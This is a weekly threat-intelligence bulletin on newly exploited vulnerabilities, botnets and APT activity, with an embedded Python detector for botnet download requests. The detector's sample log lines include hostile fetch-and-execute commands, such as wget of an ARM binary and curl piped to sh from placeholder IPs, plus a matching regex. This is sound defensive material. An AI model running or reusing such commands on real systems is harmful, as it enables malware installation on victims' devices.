Executive Summary
Cyber threats continue to escalate as four new vulnerabilities were added to the CISA KEV catalog this week, affecting tech giants like Microsoft, Oracle, Adobe and Synacor Zimbra. To make matters worse, active exploitation was detected in Cisco IOS XE Software, reinforcing the ever-growing need for vigilance.
Botnets continue to advance, with EnemyBot and Sysrv-K targeting Spring Cloud Gateway, while Mozi, Andr0xgh0st, Tsunami, Spytech Necro, and Sysrv ramp up attacks against Atlassian products, posing a growing cybersecurity challenge.
Threat actors are refining their techniques to stay ahead of defenses. UAC-0212, linked to Sandworm (APT44, Seashell Blizzard, UAC-0002), has been exploiting a patched Microsoft Windows vulnerability while the PolarEdge botnet is aggressively targeting Cisco Small Business Routers.
These advancements highlight the rise of increasingly sophisticated and persistent cyber threats, underscoring the urgency of maintaining vigilance and strengthening security measures.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
A Deserialization Vulnerability in the Oracle Agile Product Lifecycle Management (PLM) version 9.3.6 has been identified with a high CVSS Score of 8.8. This flaw enables a low-privileged attacker with HTTP network access to exploit the affected systems. Given its potential for exploitation, CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, reinforcing the urgency for organizations to deploy security updates without delay.
An Improper Access Control Vulnerability in the Microsoft Partner Center (partner.microsoft[.]com) allows an unauthenticated attacker to escalate privileges over a network, potentially compromising sensitive operations and data. With a high CVSS Score of 8.7, this flaw poses a significant risk. Microsoft has released a security update to address this vulnerability, and CISA has added it to its KEV catalog, emphasizing the need for immediate remediation.
A critical Privilege Escalation Vulnerability (CVSS 10.0) in the Cisco IOS XE Web UI, affecting versions 17.9, 17.6, 17.3, and 16.12 (for Catalyst 3650 and 3850 only), allows attackers to create administrative user accounts, potentially leading to full system compromise. Recorded Future noted that the Chinese APT group Salt Typhoon (also known as Earth Estries, GhostEmperor, UNC2886 and RedMike) has exploited this vulnerability to compromise over a thousand Cisco devices globally. Recently, GreyNoise has detected active exploitation, with 110 malicious IPs targeting vulnerable systems, primarily from Bulgaria, Brazil, and Singapore. Organizations must urgently apply patches and implement security measures to mitigate this ongoing threat.
A critical Cross-Site Scripting (XSS) Vulnerability (CVSS 9.0) in the Zimbra Collaboration Suite (ZCS) allows remote, authenticated attackers to inject malicious scripts via the /h/autoSaveDraft function. If exploited successfully, this flaw could lead to arbitrary code execution, potentially granting attackers complete control over the compromised systems. Zimbra addressed this vulnerability in July 2023, with the release of version 8.8.15 Patch 40. This flaw has now been added to the CISA KEV catalog.
A critical Deserialization Vulnerability in the Apache BlazeDS library affects Adobe ColdFusion. First reported in 2017, this flaw arises from ColdFusion's inadequate validation of data during deserialization, creating an opportunity for malicious code execution. If exploited, it could lead to unauthorized access, data breaches, and full system compromise. Historically, this vulnerability has been leveraged by the Sysrv botnet and the Rocke cryptomining malware. Additionally, with proof-of-concept (PoC) code available, the risk of exploitation remains high. Acknowledging the serious threat posed by this vulnerability, CISA has listed it in the KEV catalog, prompting organizations to prioritize patching efforts to minimize exposure.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section lists vulnerabilities observed being exploited by botnets, including recent CVEs logged in MISP. Presented here are the top 5 CVEs with payloads suggestive of botnet activity, such as fetching a binary with wget from a bare IP address.
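The indicator described above (a download command such as wget or curl pointing at a raw IP address inside an HTTP request) is easy to turn into a log-triage heuristic. The following is an added example, not Loginsoft or Cytellite code: it parses constructed access-log lines, percent-decodes the request target (repeatedly, so double-encoded payloads are not missed), and reports each request whose decoded form invokes wget or curl against an IP-literal host. The log format, the sample lines and the regular expressions are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format style); not sensor telemetry.
# 192.0.2.x / 198.51.100.x / 203.0.113.x are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Feb/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.11 - - [24/Feb/2025:10:01:05 +0000] "POST /cgi-bin/login HTTP/1.1" 200 88
198.51.100.7 - - [24/Feb/2025:10:02:17 +0000] "GET /shell?cd%20/tmp;wget%20http://192.0.2.55/bins/arm7;chmod%20777%20arm7;./arm7 HTTP/1.1" 404 0
198.51.100.9 - - [24/Feb/2025:10:03:40 +0000] "GET /api?cmd=curl%20-s%20http%3A%2F%2F192.0.2.66%3A8080%2Fx.sh%7Csh HTTP/1.1" 404 0
203.0.113.12 - - [24/Feb/2025:10:04:01 +0000] "GET /docs?q=wget%20https://example.org/manual.pdf HTTP/1.1" 200 1024
"""

# Assumed log layout: client, ident, user, [timestamp], "METHOD target HTTP/x.y", status
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Heuristic: wget/curl, optional flags, optional scheme, then a dotted-quad host.
# A download from a hostname (e.g. a vendor site) deliberately does NOT match;
# the report's indicator is specifically the use of a bare IP address.
DOWNLOAD = re.compile(
    r'\b(?P<tool>wget|curl)\b\s+(?:-{1,2}\S+\s+)*(?:https?://)?'
    r'(?P<host>(?:\d{1,3}\.){3}\d{1,3})'
)


def decode_target(target: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so %2520-style double encoding is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_botnet_downloads(log_text: str) -> list:
    """Return one record per request whose decoded target fetches from an IP literal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        decoded = decode_target(m.group("target"))
        d = DOWNLOAD.search(decoded)
        if d:
            hits.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "tool": d.group("tool"),
                "host": d.group("host"),
                "status": int(m.group("status")),
                "request": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in find_botnet_downloads(SAMPLE_LOG):
        print(f'{hit["ts"]} src={hit["src"]} {hit["tool"]} -> {hit["host"]} '
              f'status={hit["status"]} request={hit["request"]}')
```

Two of the five constructed lines are flagged (the wget fetch of an ARM binary and the curl-pipe-to-sh fetch); the wget of a PDF from a hostname is not, which keeps the rule aligned with the indicator the report describes rather than with download tools in general. The matched source addresses and download hosts are the values worth pivoting on against the week's MISP entries.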
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information comes from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
CERT-UA has attributed the exploitation of CVE-2024-38213, a now-patched Microsoft Windows security vulnerability, to the UAC-0212 group, a subcluster within the Sandworm hacking collective (also known as APT44, Seashell Blizzard, and UAC-0002). During the second half of 2024, the attackers used maliciously crafted documents to exploit this flaw as part of their cyber operations.
Sekoia's Threat Detection and Research (TDR) team has uncovered PolarEdge, a sophisticated IoT-based botnet campaign targeting vulnerable Cisco Small Business Routers and other edge devices. Active since at least late 2023, the botnet has infected over 2000 devices worldwide. The attackers exploited CVE-2023-20118, a remote code execution vulnerability affecting multiple Cisco Small Business Router models, to gain control over compromised devices.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2025/02/24/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2025/02/25/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-cisco-vulnerabilities-tied-to-salt-typhoon-attacks
- https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/
- https://cert.gov.ua/article/6282517